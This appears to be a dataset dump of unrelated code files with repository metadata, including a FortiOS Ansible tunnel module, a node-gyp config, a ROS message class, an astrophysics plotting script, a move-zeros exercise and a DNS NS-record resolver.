[关于如何提交翻译以及后续更新的教程](https://github.com/xitu/gold-miner/wiki/%E5%85%B3%E4%BA%8E%E5%A6%82%E4%BD%95%E6%8F%90%E4%BA%A4%E7%BF%BB%E8%AF%91%E4%BB%A5%E5%8F%8A%E5%90%8E%E7%BB%AD%E6%9B%B4%E6%96%B0%E7%9A%84%E6%95%99%E7%A8%8B)\n3. [如何参与校对及校对的正确姿势](https://github.com/xitu/gold-miner/wiki/%E5%8F%82%E4%B8%8E%E6%A0%A1%E5%AF%B9%E7%9A%84%E6%AD%A3%E7%A1%AE%E5%A7%BF%E5%8A%BF)\n4. [文章分享到掘金指南](https://github.com/xitu/gold-miner/wiki/%E5%88%86%E4%BA%AB%E5%88%B0%E6%8E%98%E9%87%91%E6%8C%87%E5%8D%97)\n5. [译文排版规则指北](https://github.com/xitu/gold-miner/wiki/%E8%AF%91%E6%96%87%E6%8E%92%E7%89%88%E8%A7%84%E5%88%99%E6%8C%87%E5%8C%97)\n6.[积分兑换:小礼物列表](https://github.com/xitu/gold-miner/wiki/%E7%A7%AF%E5%88%86%E5%85%91%E6%8D%A2)\n\n\n\n\n", "weibo_link": "", "github_link": "https://github.com/xitu/gold-miner", "homepage_link": "", "ctime": 1615486318, "mtime": 1615486318, "org_id": "6930489296285597696", "brief_introduction": "一个帮助开发者成长的社区", "introduction_preview": "掘金翻译计划\n掘金翻译计划 是一个翻译优质互联网技术文章的社区,文章来源为 掘金 上的英文分享文章。内容覆盖区块链、人工智能、Android、iOS、前端、后端、设计、产品、算法和其他等领域,以及各大型优质 官方文档及手册,读者为热爱新技术的新锐开发者。\n掘金翻译计划目前翻译完成 2027 余篇文章,官方文档及手册 13 个,共有 1000 余名译者贡献翻译和校对。\n官方指南\n推荐优质英文文章到掘金翻译计划\n翻译计划译者教程\n\n如何参与翻译\n关于如何提交翻译以及后续更新的教程\n如何参与校对及校对的正确姿势\n文章分享到掘金指南\n译文排版规则指北\n6.积分兑换:小礼物列表\n"}, "follower_count": 1080, "article_view_count": 504149, "article_digg_count": 5100}, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903891184648205", "article_info": {"article_id": "6844903891184648205", "user_id": "2911162518997064", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "https://juejin.im/post/6844903891184648205", "cover_image": "", "is_gfw": 0, "title": "利用css‘content实现指令式tooltip文字提示", "brief_content": "直接上图分析执行流程鼠标移入节点检测是该节点是否存在开启实现tooltip实现的标识(类名,属性等)检测主题、位置(类名,属性等)生成/显示气泡借鉴他人让我们先来看看element-ui的toolti", "is_english": 0, "is_original": 1, "user_index": 0.004235361169642, "original_type": 0, "original_author": "", "content": "", "ctime": "1563329258", "mtime": "1599995995", "rtime": "1563331138", "draft_id": "6845076377989808141", "view_count": 3093, "collect_count": 55, "digg_count": 43, "comment_count": 9, "hot_index": 206, "is_hot": 0, "rank_index": 0.00056466, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2911162518997064", "user_name": "聪明的汤姆", "company": "", "job_title": "", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/4/21/1719a911e0a373a8~tplv-t2oaga2asx-image.image", "level": 4, "description": "喜欢研究不为人知的前端技巧,让我们一起在月球时代的白日梦里畅游吧🤩", "followee_count": 37, "follower_count": 5757, "post_article_count": 16, "digg_article_count": 46, "got_digg_count": 6034, "got_view_count": 161168, "post_shortmsg_count": 10, "digg_shortmsg_count": 6, "isfollowed": false, "favorable_author": 1, "power": 7645, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6844903891184648205, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}], "cursor": "eyJ2IjoiNzAwNzgwMzIxNDc1ODE1MDE3NSIsImkiOjIxODB9", "count": 4601, "has_more": true}
|
[
"[email protected]"
] | |
2af71e101ceac700047b14f879a4f1bfe9cdd8ee
|
42685099f1e25e5c1db51b98546e0be495d2789f
|
/v6.0.2/system/fortios_system_ipip_tunnel.py
|
31f4aa4a9c00a6e26f63b162ddc13d13344ebe69
|
[
"Apache-2.0"
] |
permissive
|
sxhdroid/ansible_fgt_modules
|
02aaf9af33063d8178e7e898666ac9cdef150a00
|
58d02d80a8d0ff145bee226b345ad9738af523f6
|
refs/heads/master
| 2020-04-18T01:34:45.990750 | 2019-01-22T10:47:36 | 2019-01-22T10:47:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,097 |
py
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2018 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# the lib use python logging can get it if the following is set in your
# Ansible config.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_ipip_tunnel
short_description: Configure IP in IP Tunneling in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS by
allowing the user to configure system feature and ipip_tunnel category.
Examples includes all options and need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate ip adress.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: false
system_ipip_tunnel:
description:
- Configure IP in IP Tunneling.
default: null
suboptions:
state:
description:
- Indicates whether to create or remove the object
choices:
- present
- absent
interface:
description:
- Interface name that is associated with the incoming traffic from available options. Source system.interface.name.
local-gw:
description:
- IPv4 address for the local gateway.
name:
description:
- IPIP Tunnel name.
required: true
remote-gw:
description:
- IPv4 address for the remote gateway.
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Configure IP in IP Tunneling.
fortios_system_ipip_tunnel:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
system_ipip_tunnel:
state: "present"
interface: "<your_own_value> (source system.interface.name)"
local-gw: "<your_own_value>"
name: "default_name_5"
remote-gw: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: string
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: string
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: string
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: string
sample: "key1"
name:
description: Name of the table used to fulfill the request
returned: always
type: string
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: string
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: string
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: string
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: string
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: string
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: string
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
fos = None
def login(data):
host = data['host']
username = data['username']
password = data['password']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password)
def filter_system_ipip_tunnel_data(json):
option_list = ['interface', 'local-gw', 'name',
'remote-gw']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def system_ipip_tunnel(data, fos):
vdom = data['vdom']
system_ipip_tunnel_data = data['system_ipip_tunnel']
filtered_data = filter_system_ipip_tunnel_data(system_ipip_tunnel_data)
if system_ipip_tunnel_data['state'] == "present":
return fos.set('system',
'ipip-tunnel',
data=filtered_data,
vdom=vdom)
elif system_ipip_tunnel_data['state'] == "absent":
return fos.delete('system',
'ipip-tunnel',
mkey=filtered_data['name'],
vdom=vdom)
def fortios_system(data, fos):
login(data)
methodlist = ['system_ipip_tunnel']
for method in methodlist:
if data[method]:
resp = eval(method)(data, fos)
break
fos.logout()
return not resp['status'] == "success", resp['status'] == "success", resp
def main():
fields = {
"host": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": "False"},
"system_ipip_tunnel": {
"required": False, "type": "dict",
"options": {
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"interface": {"required": False, "type": "str"},
"local-gw": {"required": False, "type": "str"},
"name": {"required": True, "type": "str"},
"remote-gw": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
global fos
fos = FortiOSAPI()
is_error, has_changed, result = fortios_system(module.params, fos)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
3f3bf6e43eebbc4bc557d29096041bd38f644295
|
3922557a09e8573a10328513d25c551365916b36
|
/node_modules/socket.io/node_modules/socket.io-client/node_modules/ws/build/config.gypi
|
55677338992d2b1cea185bf970f72d860d53170d
|
[
"MIT"
] |
permissive
|
justintime170/nodeserv-test
|
f6b287f372f5859a78051a7f6e77ab441047bb7f
|
96e435fa9682303cc9cf07fbafdb55f37d68b08d
|
refs/heads/master
| 2016-09-05T23:46:03.891240 | 2014-08-21T07:30:13 | 2014-08-21T07:30:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,685 |
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_install_waf": "true",
"node_prefix": "/usr",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"target_arch": "x64",
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/root/.node-gyp/0.8.20",
"copy_dev_lib": "true",
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/etc/npmignore",
"init_author_url": "",
"shell": "/bin/bash",
"parseable": "",
"userignorefile": "/root/.npmignore",
"cache_max": "null",
"init_author_email": "",
"sign_git_tag": "",
"ignore": "",
"long": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"npat": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"coverage": "",
"json": "",
"pre": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/root/.npm-init.js",
"userconfig": "/root/.npmrc",
"npaturl": "http://npat.npmjs.org/",
"node_version": "v0.8.20",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"username": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "null",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"yes": "",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/root/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "node/v0.8.20 linux x64",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "0.0.0",
"umask": "18",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/root/tmp",
"unsafe_perm": "",
"link": "",
"prefix": "/usr"
}
}
|
[
"root@raspberrypi.(none)"
] |
root@raspberrypi.(none)
|
d0bf18c817e4f7f237487482234c057de31e6941
|
73189d4d0b39efe5864d25aff07d8338ab8f3110
|
/devel/lib/python2.7/dist-packages/tf2_msgs/msg/_LookupTransformFeedback.py
|
83b908a2db3ccc30e8952c4719a78f5af29e7c94
|
[] |
no_license
|
jungwoohan72/Multi_Robot_Search_And_Rescue
|
a64590a0f899682c2429400c5cb6d4d8a7d7fd99
|
3e70f9e9b895a96e045f19a05780b091c16f2e60
|
refs/heads/main
| 2023-07-06T14:03:58.980624 | 2021-08-01T05:15:02 | 2021-08-01T05:15:02 | 379,856,303 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,171 |
py
|
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from tf2_msgs/LookupTransformFeedback.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class LookupTransformFeedback(genpy.Message):
_md5sum = "d41d8cd98f00b204e9800998ecf8427e"
_type = "tf2_msgs/LookupTransformFeedback"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
"""
__slots__ = []
_slot_types = []
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(LookupTransformFeedback, self).__init__(*args, **kwds)
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
|
[
"[email protected]"
] | |
c33136cba8c462e8266f910e5907785846fdc01e
|
9c368c9fe78a2dd186daeed2d0714651c1c27d66
|
/absorption/ml_project/analyse_spectra/plot_Nweighted_deltaTZ_leg.py
|
05d0118c919d27b69595a6456dfdb4603b50129e
|
[] |
no_license
|
sarahappleby/cgm
|
5ff2121919e36b10069692f71fb1dc03f3678462
|
656bf308771dd3ff2f8c2e77107cdc14507c7ce7
|
refs/heads/master
| 2023-01-24T03:10:01.610418 | 2023-01-20T11:04:31 | 2023-01-20T11:04:31 | 160,820,718 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,422 |
py
|
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import AutoMinorLocator
import numpy as np
import h5py
import pygad as pg
import sys
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=15)
if __name__ == '__main__':
model = sys.argv[1]
wind = sys.argv[2]
snap = sys.argv[3]
lines = ["H1215", "MgII2796", "CII1334", "SiIII1206", "CIV1548", "OVI1031"]
plot_lines = ['HI', 'MgII', 'CII', 'SiIII', 'CIV', 'OVI']
line_ev = np.log10([13.6, 15.04, 24.38, 33.49, 64.49, 138.1]) # in eV
adjust_x = [0.015, 0.025, 0.02, 0.025, 0.02, 0.02]
chisq_lim_dict = {'snap_151': [4., 50., 15.8, 39.8, 8.9, 4.5],
'snap_137': [3.5, 28.2, 10., 35.5, 8.0, 4.5],
'snap_125': [3.5, 31.6, 15.8, 39.8, 10., 5.6],
'snap_105': [4.5, 25.1, 25.1, 34.5, 10., 7.1],}
chisq_lim = chisq_lim_dict[f'snap_{snap}']
snapfile = f'/disk04/sapple/data/samples/{model}_{wind}_{snap}.hdf5'
s = pg.Snapshot(snapfile)
redshift = s.redshift
rho_crit = float(s.cosmology.rho_crit(z=redshift).in_units_of('g/cm**3'))
cosmic_rho = rho_crit * float(s.cosmology.Omega_b)
N_min = [12.7, 11.5, 12.8, 11.7, 12.8, 13.2]
zsolar = [0.0134, 7.14e-4, 2.38e-3, 6.71e-4, 2.38e-3, 5.79e-3]
deltath = 2.046913
Tth = 5.
delta_fr200 = 0.25
min_fr200 = 0.25
nbins_fr200 = 5
fr200 = np.arange(min_fr200, (nbins_fr200+1)*delta_fr200, delta_fr200)
idelta = 0.8 / (len(fr200) -1)
icolor = np.arange(0.1, 0.9+idelta, idelta)
cmap = cm.get_cmap('viridis')
colors = [cmap(i) for i in icolor]
plot_dir = '/disk04/sapple/cgm/absorption/ml_project/analyse_spectra/plots/'
sample_dir = f'/disk04/sapple/data/samples/'
with h5py.File(f'{sample_dir}{model}_{wind}_{snap}_galaxy_sample.h5', 'r') as sf:
gal_ids = sf['gal_ids'][:]
mass = sf['mass'][:]
ssfr = sf['ssfr'][:]
fig, ax = plt.subplots(3, 1, figsize=(7, 6.5), sharey='row', sharex='col')
ax = ax.flatten()
for l, line in enumerate(lines):
results_file = f'/disk04/sapple/data/normal/results/{model}_{wind}_{snap}_fit_lines_{line}.h5'
weighted_D = np.zeros(len(fr200))
weighted_D_25 = np.zeros(len(fr200))
weighted_D_75 = np.zeros(len(fr200))
weighted_T = np.zeros(len(fr200))
weighted_T_25 = np.zeros(len(fr200))
weighted_T_75 = np.zeros(len(fr200))
weighted_Z = np.zeros(len(fr200))
weighted_Z_25 = np.zeros(len(fr200))
weighted_Z_75 = np.zeros(len(fr200))
for i in range(len(fr200)):
with h5py.File(results_file, 'r') as hf:
all_Z = hf[f'log_Z_{fr200[i]}r200'][:] - np.log10(zsolar[l])
all_T = hf[f'log_T_{fr200[i]}r200'][:]
all_D = hf[f'log_rho_{fr200[i]}r200'][:] - np.log10(cosmic_rho)
all_N = hf[f'log_N_{fr200[i]}r200'][:]
all_chisq = hf[f'chisq_{fr200[i]}r200'][:]
all_ids = hf[f'ids_{fr200[i]}r200'][:]
mask = (all_N > N_min[l]) * (all_chisq < chisq_lim[l])
all_Z = all_Z[mask]
all_T = all_T[mask]
all_D = all_D[mask]
all_ids = all_ids[mask]
all_N = all_N[mask]
order = np.argsort(all_D)
weighted_D[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
weighted_D_25[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
weighted_D_75[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
order = np.argsort(all_T)
weighted_T[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
weighted_T_25[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
weighted_T_75[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
order = np.argsort(all_Z)
weighted_Z[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
weighted_Z_25[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
weighted_Z_75[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
if i == 0:
ax[0].errorbar(line_ev[l], weighted_D[i], color=colors[i], yerr=np.array([[weighted_D[i] - weighted_D_25[i], weighted_D_75[i] - weighted_D[i],]]).T,
lw=1, ls='None', marker='None', capsize=2)
ax[1].errorbar(line_ev[l], weighted_T[i], color=colors[i], yerr=np.array([[weighted_T[i] - weighted_T_25[i], weighted_T_75[i] - weighted_T[i],]]).T,
lw=1, ls='None', marker='None', capsize=2)
ax[2].errorbar(line_ev[l], weighted_Z[i], color=colors[i], yerr=np.array([[weighted_Z[i] - weighted_Z_25[i], weighted_Z_75[i] - weighted_Z[i],]]).T,
lw=1, ls='None', marker='None', capsize=2)
ax[0].scatter(line_ev[l], weighted_D[i], color=colors[i])
ax[1].scatter(line_ev[l], weighted_T[i], color=colors[i])
if l == 0:
ax[2].scatter(line_ev[l], weighted_Z[i], color=colors[i], label=r'$\rho / r_{{200}} = {{{}}}$'.format(fr200[i]))
else:
ax[2].scatter(line_ev[l], weighted_Z[i], color=colors[i])
ax[0].annotate(plot_lines[l], xy=(line_ev[l] - adjust_x[l], np.min(weighted_D - 0.35)), fontsize=13)
ax[0].axhline(deltath, ls=':', c='k', lw=1)
ax[1].axhline(Tth, ls=':', c='k', lw=1)
ax[2].legend(loc=4, fontsize=12)
ax[0].set_ylim(1, 4.)
ax[1].set_ylim(4, 5.7)
ax[2].set_ylim(-1.75, )
ax[2].set_xlabel(r'${\rm log }(E / {\rm eV})$')
ax[0].set_ylabel(r'${\rm log }\delta$')
ax[1].set_ylabel(r'${\rm log } (T / {\rm K})$')
ax[2].set_ylabel(r'${\rm log} (Z / Z_{\odot})$')
ax[0].xaxis.set_minor_locator(AutoMinorLocator(4))
ax[1].xaxis.set_minor_locator(AutoMinorLocator(4))
plt.tight_layout()
fig.subplots_adjust(wspace=0., hspace=0.)
plt.savefig(f'{plot_dir}{model}_{wind}_{snap}_Nweighted_deltaTZ_chisqion.pdf', format='pdf')
plt.clf()
|
[
"[email protected]"
] | |
80e40972cefad943c6a440d4cdb5f832a4e262f0
|
152fc8d9722e9811c0f15f26acf7cd1f82849b2a
|
/Facebook/move_zeros.py
|
163329db6cd3f9cbf7a56edfbae5b805e5f38c2e
|
[] |
no_license
|
uoojin1/algo_study
|
5942bc2ea9f2a752b36db296b42e1636a43c1553
|
c5078b377105f092668b594b0d7a297c4422b4a1
|
refs/heads/master
| 2020-04-13T17:38:05.429046 | 2019-02-07T02:32:24 | 2019-02-07T02:32:24 | 163,352,673 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 718 |
py
|
''' move zeros
input: [0,1,0,3,12]
output: [1,3,12,0,0]
1. do this in place, w/o making a copy of the array
2. minimize the number of operations
'''
'''
[0, 1, 0, 3, 12]
^
so basically have a pointer that points to where I should put the next non zero element to
after iterating through the entire array, I should have all the non zero numbers put to the
left side of the array. and the index should point at the start index of 0s to the right
'''
def moveZeros(nums):
index = 0
for num in nums:
if num != 0:
nums[index] = num
index += 1
for i in range(index, len(nums)):
nums[i] = 0
return nums
print moveZeros([0,1,0,3,12,0,5,2,1,70,0,0,3,0,2,1,5])
|
[
"[email protected]"
] | |
08c1931fd532b86ad3326a6391b1de86663e1372
|
64f81cfd4e588c1b6ead8481b2e35196c2149413
|
/obtaining3.58/obtaining_dns_client/resolving_domain_dns/resolving_domain_ns_by_tld2.py
|
fa5f9e6680c8e0d71df28c3f6b8e606ab86dbbb7
|
[] |
no_license
|
JX-Wang/Valid_DNS_verification
|
b1d7afb14fef78a30d1c21dffe6cf1ce4c5e2dbf
|
aecf68ca587022449c80b54ec53b43d9ec8dd8f0
|
refs/heads/master
| 2020-07-28T19:03:16.759597 | 2019-09-19T08:43:30 | 2019-09-19T08:43:30 | 209,502,842 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,858 |
py
|
#encoding:utf-8
"""
通过向各个层次的权威NS地址查询,获取域名的NS记录。
可以配置为在线和离线查询
目前只支持域名是主域名
"""
import dns
import random
import dns.name
import dns.query
import dns.resolver
def get_authoritative_nameserver(domain, offline=False, tld_server = None, default_dns = None, retry_times=1):
"""
通过向各个权威NS发送查询请求,获取域名的NS记录
:param domain: 要查询的域名,目前只支持注册域名的权威查询
:param offline: 是否离线查询,在线表示顶级域名的权威通过配置好的递归服务器获取;离线表示顶级域名的权威地址由输入确定
:param tld_server: 若为离线查询,则tld_server为指定的顶级域名权威IP地址,务必为IP
:param retry_times: 重试次数
:return: rrset ,域名的NS记录
"""
if offline and not tld_server: # 若使用离线数据,但顶级域名权威为空,则输出错误
return '顶级域名权威地址IP不能为空'
n = dns.name.from_text(domain)
if len(n) == 1:
return "域名的顶级域名不存在"
depth = 2
rrset = None
if default_dns:
nameservers = [default_dns, '114.114.114.114', '223.5.5.5','119.29.29.29','180.76.76.76']
else:
nameservers = ['114.114.114.114', '223.5.5.5','119.29.29.29','180.76.76.76']
nameserver = default_dns # 初始化dns
default = dns.resolver.Resolver(configure=False) # 自定义本地递归服务器
default.timeout = 2
random.shuffle(nameservers)
default.nameservers = nameservers
while True:
s = n.split(depth)
last = s[0].to_unicode() == u'@'
sub = s[1]
if len(sub) == 2: # 若为顶级域名,且为offline,则使用指定的顶级域名权威查询域名的ns
if offline:
nameserver = tld_server
depth += 1
continue
# query = dns.message.make_query(sub, dns.rdatatype.NS, use_edns=True) # 增加使用edns
query = dns.message.make_query(sub, dns.rdatatype.NS)
try:
response = dns.query.udp(query, nameserver, timeout=2)
except:
if retry_times:
retry_times = retry_times - 1
if not rrset:
continue
# 重新选择一个ns地址
rrset_cnt = len(rrset) # rrset的大小
random_serial = random.randint(0, rrset_cnt - 1)
rr = rrset[random_serial] # 随机选择一条记录
try:
authority = rr.target
except Exception,e:
return str(e)
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
return "resovling nameserver failed"
continue
else:
return 'TIMEOUT'
retry_times = 1 # 若成功,则重新初始化超时重试次数
rcode = response.rcode()
if rcode != dns.rcode.NOERROR:
if rcode == dns.rcode.NXDOMAIN:
# print '%s does not exist.' % sub
return 'NOEXSIT'
else:
return 'Error %s' % dns.rcode.to_text(rcode)
try: # 新增加异常判断
if len(response.authority) > 0:
rrset = response.authority[0]
else:
rrset = response.answer[0]
except Exception, e:
return str(e)
if last:
return rrset
rrset_cnt = len(rrset) # rrset的大小
random_serial = random.randint(0, rrset_cnt-1) # 根据长度,随机选择一个序号
rr = rrset[random_serial] # 随机选择一条记录
if rr.rdtype == dns.rdatatype.SOA:
# print 'Same server is authoritative for %s' % sub
pass
else:
try:
authority = rr.target
except:
return 'authority soa target error'
# print '%s is authoritative for %s' % (authority, sub)
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
return "resovling nameserver failed"
depth += 1
def parse_rc_ns(rrset):
"""解析出域名的NS集合"""
ns = []
respond_main_domain = ""
r = str(rrset.to_text())
for i in r.split('\n'):
i = i.split(' ')
rc_type, rc_ttl = i[3], i[1]
if rc_type == 'NS':
ns.append((i[4][:-1]).lower())
respond_main_domain = i[0][:-1]
ns.sort()
return respond_main_domain, ns
def get_domain_ns_hierarchical_dns(main_domain, offline = False, tld_server=None, default_dns=None):
"""按照DNS的分布层级,获取域名NS记录"""
rrset = get_authoritative_nameserver(main_domain,offline,tld_server,default_dns)
if isinstance(rrset, dns.rrset.RRset):
respond_main_domain, ns = parse_rc_ns(rrset)
if main_domain == respond_main_domain:
return [main_domain, ns], 'TRUE'
